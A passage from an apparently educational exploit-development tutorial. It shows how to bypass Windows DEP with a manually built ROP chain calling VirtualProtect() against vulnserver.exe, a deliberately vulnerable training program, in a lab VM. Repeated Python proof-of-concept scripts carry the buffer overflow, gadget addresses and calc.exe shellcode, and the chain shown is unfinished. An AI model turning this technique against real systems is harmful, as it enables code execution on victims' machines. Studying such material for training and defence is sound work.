What this means is that a region of memory cannot be both writable AND executable at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jump to the stack pointer would suffice, and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode, you will be able to write it to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted, an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)
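To make the flNewProtect value a little more concrete, here is a small sketch that maps a few of the documented memory protection constants to their names and packs 0x40 the same way the POC scripts pack their values. The describe() helper and the PROTECTIONS table are hypothetical conveniences, not part of any Windows or Python API:

```python
import struct

# A subset of the documented memory protection constants.
PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}


def describe(value):
    """Return the constant's name, or a note that the value is not in the table."""
    return PROTECTIONS.get(value, "unknown (0x%02x)" % value)


fl_new_protect = 0x40
packed = struct.pack('<L', fl_new_protect)   # little-endian DWORD

print(describe(fl_new_protect))
print(repr(packed))
```

0x40 is the value we ultimately want sitting in the flNewProtect slot when VirtualProtect() is called.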

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get run?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason ROP is called Return Oriented Programming is that each useful instruction sequence ends with a ret instruction. Each sequence of assembly instructions plus its ret is known as a ROP gadget. When these gadgets are laid out consecutively, one after the other, the result is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever the stack pointer points to (the value on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, each ret will return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening until there are no more left! This makes life a bit easier.
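If it helps, the ret-driven flow described above can be mimicked with a toy emulator. This is only a sketch: the addresses 0x1000 and 0x2000, the gadget functions, and the register dictionary are invented for illustration and do not correspond to anything in vulnserver.exe:

```python
# Toy emulator for ret-driven execution. All addresses and gadgets are invented.

regs = {"eax": 0, "ecx": 0}


def gadget_inc_eax():
    regs["eax"] += 1


def gadget_mov_ecx_eax():
    regs["ecx"] = regs["eax"]


# Hypothetical addresses mapped to the instruction(s) that precede each ret.
GADGETS = {
    0x1000: gadget_inc_eax,        # inc eax ; ret
    0x2000: gadget_mov_ecx_eax,    # mov ecx, eax ; ret
}

# The attacker-controlled stack is nothing more than a list of addresses.
stack = [0x1000, 0x1000, 0x1000, 0x2000]

executed = []
esp = 0                      # index of the current top of the stack
while esp < len(stack):
    eip = stack[esp]         # ret: load the value at ESP into EIP...
    esp += 1                 # ...and move ESP to the next entry
    GADGETS[eip]()           # run the gadget body, which ends in another ret
    executed.append(eip)

print(regs)
```

Nothing on the "stack" is ever executed. It is only read as a list of places to go next, which is why DEP does not get in the way.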

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.
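For a feel of what searching manually means, here is a minimal sketch that scans a blob of bytes for the ret opcode (0xC3) and shows the bytes sitting in front of each hit. It is not a replacement for rp++ or mona.py: it does not disassemble anything, and a 0xC3 byte in a real binary may be part of another instruction or plain data. The find_ret_offsets() helper and the sample bytes are hypothetical:

```python
RET = 0xC3  # opcode for a near ret on x86


def find_ret_offsets(code, context=4):
    """Yield (offset, preceding_bytes) for every 0xC3 byte found in code."""
    data = bytearray(code)
    for offset, byte in enumerate(data):
        if byte == RET:
            start = max(0, offset - context)
            yield offset, bytes(data[start:offset])


# Hypothetical sample: "push esp ; pop ecx ; ret" followed by "inc ecx ; ret".
sample = b"\x54\x59\xc3\x41\xc3"

hits = list(find_ret_offsets(sample))
for offset, before in hits:
    preceding = " ".join("%02x" % b for b in bytearray(before))
    print("ret at +0x%x, preceded by: %s" % (offset, preceding))
```

Each hit is only a candidate. You would still need to disassemble the bytes in front of it to see whether they form something useful.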

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f option specifies the file. The -r option specifies the maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find an lpflOldProtect address. Any address with write permissions will work for this parameter.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash (no ROP gadgets have been added yet)
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an extra value, labeled return address, in the parameters variable of the POC. This is not one of the official parameters for VirtualProtect(). The reason this address is there (directly under the VirtualProtect() pointer) is that once the function finishes, there needs to be a way to execute our shellcode. The return address slot is going to contain the address of the shellcode, so the application will jump straight to the user-supplied shellcode after VirtualProtect() runs. By then, the memory holding the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now is one of the properties of DEP. The shellcode cannot be executed until we change the permissions of the memory it lives in. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing from it.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that a Windows API function, when called, takes the items on the top of the stack (where the stack pointer points) as its parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP, all of the supplied data is on the stack).
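Here is a small sketch of how those six DWORDs line up once a ret has popped the VirtualProtect() pointer into EIP. The values are the placeholders from the POC above, and the labels and offset arithmetic are only there for readability. It assumes the usual 32-bit calling convention, where the return address sits at ESP on function entry and the arguments follow it:

```python
import struct

# Placeholder values from the POC; the labels are only for readability.
frame = [
    ("VirtualProtect()", 0x77e22e15),
    ("return address",   0x4c4c4c4c),
    ("lpAddress",        0x45454545),
    ("dwSize",           0x03030303),
    ("flNewProtect",     0x54545454),
    ("lpflOldProtect",   0x62506060),
]

parameters = b"".join(struct.pack('<L', value) for _, value in frame)

# After ret pops the first DWORD into EIP, ESP points at the return address
# and the four arguments follow it, 4 bytes apart.
layout = []
for index, (label, value) in enumerate(frame):
    offset = (index - 1) * 4          # offset from ESP at function entry
    layout.append((offset, label, value))

for offset, label, value in layout:
    where = "popped into EIP" if offset < 0 else "[esp+0x%02x]" % offset
    print("%-16s 0x%08x  %s" % (label, value, where))
```

This is why the return address placeholder has to sit directly under the VirtualProtect() pointer, with the real parameters after it.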

As you can see, all of the parameters are there. Here, at a high level, is how we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead, what we will do is put the calculated values needed to call VirtualProtect() into registers. Then, we will overwrite the placeholders we currently have with our calculated values. For example, we could get the value for lpAddress into a register. Then, using ROP, we could write the contents of that register over the current placeholder for lpAddress, so the placeholder ends up holding the intended (real) value of lpAddress.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.
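To convince yourself that these two gadgets really leave the stack pointer in both registers, here is a toy walk-through. It models only push, pop, and mov on a dictionary of registers and leaves out the ret instructions. The starting ESP is the example value from the register view above, and the starting EAX and ECX values are arbitrary:

```python
# Toy model of the two gadgets. Only push/pop/mov are modelled (ret is omitted).
regs = {"esp": 0x018DF9E4, "eax": 0x00000001, "ecx": 0x00000000}
memory = {}


def push(value):
    regs["esp"] -= 4
    memory[regs["esp"]] = value


def pop(register):
    regs[register] = memory[regs["esp"]]
    regs["esp"] += 4


# Gadget 1: push esp ; pop ecx ; ret
push(regs["esp"])      # the value pushed is ESP as it was before the decrement
pop("ecx")

# Gadget 2: mov eax, ecx ; ret
regs["eax"] = regs["ecx"]

print("ESP=0x%08X ECX=0x%08X EAX=0x%08X" % (regs["esp"], regs["ecx"], regs["eax"]))
```

The push and pop cancel each other out, so ESP ends up where it started and ECX and EAX both hold a copy of it.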

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect() are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite or return into those parameters yet, we would simply like to “jump” over them for now. To do this, we can add to the current value of ESP with an add esp, VALUE + ret ROP gadget. This will raise ESP above its current value (where it currently points at the VirtualProtect() pointer), which means we will be farther down the stack, past the VirtualProtect() call and its parameters. Since all of our ROP gadgets end with a ret, the value at the new (greater) stack pointer will be loaded into EIP by the ret in add esp, VALUE + ret. This will make more sense in the screenshots below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll
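The reason 0x1C works can be checked with some quick arithmetic. The sketch below assumes that when add esp, 0x1C executes, ESP is pointing at the VirtualProtect() pointer (the first DWORD after the gadget's own address). It uses the six placeholder DWORDs from the POC plus four bytes of padding, and a marker value of 0xDEADBEEF standing in for whatever comes next. The dword() helper is hypothetical:

```python
import struct


def dword(value):
    """Pack a value as a little-endian 32-bit DWORD."""
    return struct.pack('<L', value)


# VirtualProtect() pointer, return address, and the four parameter placeholders
parameters = b"".join(dword(v) for v in (
    0x77e22e15, 0x4c4c4c4c, 0x45454545, 0x03030303, 0x54545454, 0x62506060))
padding = b"\x90" * 4            # 4 bytes so the total skipped equals 0x1C
marker = dword(0xDEADBEEF)       # stand-in for the next gadget

after_gadget = parameters + padding + marker
skip = 0x1C
landed = struct.unpack('<L', after_gadget[skip:skip + 4])[0]

print("bytes to skip: 0x%X" % (len(parameters) + len(padding)))
print("ret will load: 0x%08X" % landed)
```

Six DWORDs are 0x18 bytes, so four extra bytes of padding line the next gadget up exactly 0x1C bytes away.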

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take the value ESP points to (0xDEADBEEF) and load it into EIP. If this works, we will have jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now that all of the groundwork has been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes, away from the return address placeholder. Let’s change the value in ECX to equal the address of the return parameter placeholder.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll
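The number of repetitions falls straight out of the two addresses mentioned above. As a sketch, using the values from this debugging session (yours will likely differ), the twelve gadget addresses can also be generated instead of typed out one by one. The constant names are made up for illustration:

```python
import struct

RETURN_SLOT = 0x019FF9F0   # address of the return address placeholder
SAVED_ESP   = 0x019FF9E4   # value currently held in ECX
INC_ECX_RET = 0x77e17270   # inc ecx ; ret  (kernel32.dll)

# Each inc ecx adds 1, so one gadget is needed per byte of distance.
distance = RETURN_SLOT - SAVED_ESP
rop2 = struct.pack('<L', INC_ECX_RET) * distance

print("distance: 0x%X (%d) bytes" % (distance, distance))
print("gadgets:  %d, taking %d bytes on the stack" % (distance, len(rop2)))
```

Twelve single-byte increments is a bit clumsy, but it only relies on a very common gadget.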

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains the address of the return parameter placeholder. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the address of the return parameter placeholder, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.
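One way to keep track of this bookkeeping is a tiny helper that packs a gadget address followed by one dummy DWORD for every extra pop the gadget performs. This is only a sketch: the gadget() helper and its pops and filler parameters are hypothetical, and 0x50505050 is just an arbitrary filler value:

```python
import struct


def gadget(address, pops=0, filler=0x50505050):
    """Pack a gadget address followed by one dummy DWORD per extra pop."""
    return struct.pack('<L', address) + struct.pack('<L', filler) * pops


MOV_EDX_ECX_POP_EBP = 0x6ffb6162   # mov edx, ecx ; pop ebp ; ret  (msvcrt.dll)
INC_EDX = 0x77f226d5               # inc edx ; ret  (ntdll.dll)

chain = gadget(MOV_EDX_ECX_POP_EBP, pops=1)   # the dummy DWORD is eaten by pop ebp
chain += gadget(INC_EDX) * 4                  # EDX = ECX + 4

words = struct.unpack('<%dL' % (len(chain) // 4), chain)
for word in words:
    print("0x%08x" % word)
```

The dummy DWORD sits directly after the gadget that pops it, so the following ret picks up the first inc edx gadget as intended.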

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


